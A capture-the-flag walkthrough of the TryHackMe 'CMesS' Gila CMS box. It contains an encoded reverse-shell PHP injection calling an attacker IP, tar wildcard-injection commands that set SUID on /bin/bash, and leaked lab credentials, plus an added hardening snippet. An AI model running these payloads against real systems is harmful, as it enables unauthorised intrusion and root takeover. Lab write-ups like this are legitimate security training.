Laach_

CMesS - THM

Machine Info

Difficulty: Medium🟧
Link: HERE
Avg time: 75 Minutes
OS: Linux

Description: Can you root this Gila CMS box?

Recon

INFO: Before nmap we are told to add [IP] cmess.thm to /etc/hosts

Casual nmap scan

sudo nmap cmess.thm -Pn -sV -sC -p- -T4 -n -O -oN scan.txt
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-15 13:54 +0200
Nmap scan report for cmess.thm (10.114.129.136)
Host is up (0.028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d9:b6:52:d3:93:9a:38:50:b4:23:3b:fd:21:0c:05:1f (RSA)
|   256 21:c3:6e:31:8b:85:22:8a:6d:72:86:8f:ae:64:66:2b (ECDSA)
|_  256 5b:b9:75:78:05:d7:ec:43:30:96:17:ff:c6:a8:6c:ed (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 3 disallowed entries 
|_/src/ /themes/ /lib/
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-generator: Gila CMS
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=6/15%OT=22%CT=1%CU=42629%PV=Y%DS=3%DC=I%G=Y%TM=6A2FE82
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ
OS:(SP=102%GCD=1%ISR=10F%TI=Z%CI=I%II=I%TS=8)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%
OS:CI=I%II=I%TS=8)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=I%II=I%TS=8)SEQ(SP=FC%GC
OS:D=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1=M4E8ST11NW7%O2=M4E8ST11NW7%O3=M4E
OS:8NNT11NW7%O4=M4E8ST11NW7%O5=M4E8ST11NW7%O6=M4E8ST11)WIN(W1=68DF%W2=68DF%
OS:W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M4E8NNSNW7%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.60 seconds


Scan reveals:

  • 22/tcp - SSH
  • 80/tcp - HTTP

HTTP got robots.txt with 3 entries:

  • src/
  • themes/
  • lib/

Shell as www-data

My first thought was to visit src/; it redirected to something that looked like a potential LFI.

(Screenshot: LFI URL)

But no matter what I tried, I couldn't retrieve /etc/passwd, and RFI didn't work either.

INFO: The other entries in robots.txt behaved the same; I tested them but found nothing.

Later I tried running Feroxbuster; it turned up some unusual files and directories.

sudo feroxbuster -u 'http://cmess.thm/' -r -C 404
403      GET        9l       28w      274c http://cmess.thm/lib/?url=lib
403      GET        9l       28w      274c http://cmess.thm/src/?url=src
403      GET        9l       28w      274c http://cmess.thm/themes/?url=themes
200      GET      107l      290w     3851c http://cmess.thm/index
200      GET       44l      113w     1605c http://cmess.thm/src/core/assets/lazyImgLoad.js
200      GET       43l       98w     1360c http://cmess.thm/login/password_reset
200      GET      799l     1024w    15763c http://cmess.thm/lib/gila.min.css
200      GET        4l       66w    31000c http://cmess.thm/lib/font-awesome/css/font-awesome.min.css
200      GET       92l      266w     3353c http://cmess.thm/about
200      GET       68l      422w    25046c http://cmess.thm/assets/gila-logo.png
200      GET      107l      290w     3851c http://cmess.thm/search
200      GET      107l      290w     3851c http://cmess.thm/blog
200      GET       41l       99w     1580c http://cmess.thm/login
200      GET      109l      291w     3862c http://cmess.thm/category
200      GET      102l      308w     4078c http://cmess.thm/1/hello_world
200      GET      107l      290w     3865c http://cmess.thm/
200      GET      102l      308w     4078c http://cmess.thm/1
200      GET        1l        4w       68c http://cmess.thm/login/register
200      GET       21l       42w      735c http://cmess.thm/feed
200      GET      107l      290w     3851c http://cmess.thm/0
200      GET      101l      272w     3590c http://cmess.thm/author
200      GET      102l      308w     4078c http://cmess.thm/01
200      GET      109l      292w     3874c http://cmess.thm/tag
200      GET      107l      290w     3851c http://cmess.thm/Search
200      GET       92l      266w     3339c http://cmess.thm/About
200      GET      107l      290w     3851c http://cmess.thm/Index
200      GET        0l        0w        0c http://cmess.thm/api
200      GET        1l        4w       68c http://cmess.thm/login/Register
200      GET       14l       40w      563c http://cmess.thm/assets/?url=assets
500      GET        0l        0w        0c http://cmess.thm/cm
200      GET        0l        0w        0c http://cmess.thm/fm
200      GET      107l      290w     3851c http://cmess.thm/INDEX
200      GET        0l        0w        0c http://cmess.thm/login/callback

There were some weird outputs, but most of them were either not found or the main page. The only thing that caught my attention was a possible IDOR.

http://cmess.thm/0

It was returning the home page with a post that contained its title and body, but

http://cmess.thm/1

returned the title, posted by and body, but posted by was empty, which was weird. I did try other numbers such as 2, 3, 4 but they returned not found, so it was a rabbit hole. Ferox also revealed the path /login/register but it redirected to 404 — another rabbit hole. I also tried brute force on login/ with the guessed email admin@cmess.thm but after 3 tries I got rate limited — another rabbit hole. This whole page seemed like a dead end, so I tried subdomain enum with ffuf.

ffuf -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fw 522 -c

This finally gave a serious lead.

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cmess.thm
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
 :: Header           : Host: FUZZ.cmess.thm
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 522
________________________________________________

dev                     [Status: 200, Size: 934, Words: 191, Lines: 31, Duration: 4663ms]
:: Progress: [4989/4989] :: Job [1/1] :: 295 req/sec :: Duration: [0:00:17] :: Errors: 0 ::

Adding dev.cmess.thm to /etc/hosts and visiting it revealed a black page with a Development Log containing credentials for andre@cmess.thm.

## Development Log

### andre@cmess.thm

Have you guys fixed the bug that was found on live?

### support@cmess.thm

Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!

### support@cmess.thm

Update! We have had to delay the patch due to unforeseen circumstances

### andre@cmess.thm

That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.

### support@cmess.thm

Your password has been reset. Here: KPFTN_f2yxe%

The credentials worked. There was a CMS dashboard with page editing functionality. In most CMS dashboards, if page editing is available, getting a shell is trivial. At /admin/fm there is a list of files and directories, and editing index.php can give a shell. Penelope was used as the listener, as it handles and stabilizes the shell automatically.

INFO: In this file list there was an interesting file config.php containing root credentials for MySQL, maybe useful for later.

Code injected into index.php:

<?php system('printf KHJtIC90bXAvXztta2ZpZm8gL3RtcC9fO2NhdCAvdG1wL198c2ggMj4mMXxuYyAxOTIuMTY4LjEzMS45MSA0NDQ0ID4vdG1wL18pID4vZGV2L251bGwgMj4mMSAm|base64 -d|sh'); ?>

After saving and visiting the main page, Penelope catches a shell as www-data.

Shell as Andre

Password reuse from the login page was attempted but didn't work. linpeas and pspy64 were transferred to the target. pspy64 revealed a cronjob running as root every 2 minutes, but it wasn't investigated further at this point.

INFO: The cronjob wasn't investigated because write access to /home/andre was required.

linpeas kept crashing so manual enumeration was done. MySQL was checked using the credentials found earlier but nothing useful was found. Eventually /opt was checked — an obvious privesc path that was missed earlier due to linpeas issues. Inside was .password.bak with Andre's password.

www-data@cmess:/opt$ ls -al
total 12
drwxr-xr-x  2 root root 4096 Feb  6  2020 .
drwxr-xr-x 22 root root 4096 Feb  6  2020 ..
-rwxrwxrwx  1 root root   36 Feb  6  2020 .password.bak
www-data@cmess:/opt$ cat .password.bak
andres backup password
UQfsdCB7aAP6

Flag located at: /home/andre/user.txt

Shell as Root

The root cronjob was performing a backup of every file in /home/andre/backup.

*/2 *   * * *   root    cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *

The * wildcard is the key. The shell expands it to the names of the files in the directory before tar runs, so any file whose name starts with a dash is passed to tar as an argument. tar supports --checkpoint flags that execute commands at intervals. By creating files named --checkpoint=1 and --checkpoint-action=exec=[command] inside the backup directory, tar interprets them as its own flags instead of files.

INFO: Different explanation of tar wildcard injection HERE
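As an added example (not part of the original writeup), a POSIX sh check for the condition the cron line above creates, beside the hardened tar invocation that avoids it; the demo directory and file names are constructed here.

```shell
#!/bin/sh
# Added example: audit a directory that a cron job archives with an unquoted
# glob, and show the safe invocation. Paths and files are constructed for the demo.

# Print every entry in "$1" whose name starts with '-' and return 1 if any exist;
# such names are what "tar ... *" would hand to tar's option parser.
find_option_like_names() {
    dir="$1"
    found=0
    for f in "$dir"/* "$dir"/.[!.]*; do
        [ -e "$f" ] || continue
        name=${f##*/}
        case "$name" in
            -*) echo "option-like filename: $name"; found=1 ;;
        esac
    done
    return $found
}

# Weak form (the box's crontab):   cd /home/andre/backup && tar -zcf out.tar.gz *
# Hardened form: no glob at all; archive the directory contents relative to it,
# so file names are stored as paths and never reach tar's option parser.
safe_backup() {
    dir="$1"
    out="$2"
    tar -zcf "$out" -C "$dir" .
}

# Constructed demo directory: one benign file and one option-like name.
demo_dir=$(mktemp -d)
: > "$demo_dir/note"
: > "$demo_dir/--checkpoint=1"
find_option_like_names "$demo_dir" || echo "refusing to archive $demo_dir with a glob"
safe_backup "$demo_dir" "$demo_dir.tar.gz" && tar -tzf "$demo_dir.tar.gz"
rm -rf "$demo_dir" "$demo_dir.tar.gz"
```

With the hardened form, the listing shows ./--checkpoint=1 stored as an ordinary member rather than consumed as an option.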

A malicious shell.sh was created with the following payload:

#!/bin/bash

chmod +s /bin/bash

Execute permission was added and checkpoint files were created:

chmod +x shell.sh 
echo "" > "--checkpoint=1" 
echo "" > "--checkpoint-action=exec=bash shell.sh"

Final state of the backup directory:

andre@cmess:~/backup$ ls -al
total 24
drwxr-x--- 2 andre andre 4096 Jun 15 06:14 .
drwxr-x--- 5 andre andre 4096 Jun 15 06:12 ..
-rw-rw-r-- 1 andre andre    1 Jun 15 06:14 --checkpoint=1
-rw-rw-r-- 1 andre andre    1 Jun 15 06:14 --checkpoint-action=exec=bash shell.sh
-rwxr-x--- 1 andre andre   51 Feb  9  2020 note
-rwxrwxr-x 1 andre andre   32 Jun 15 06:12 shell.sh

After the cronjob fired, shell.sh was executed as root and the SUID bit was set on /bin/bash, allowing a root shell via bash -p.

Flag located at: /root/root.txt
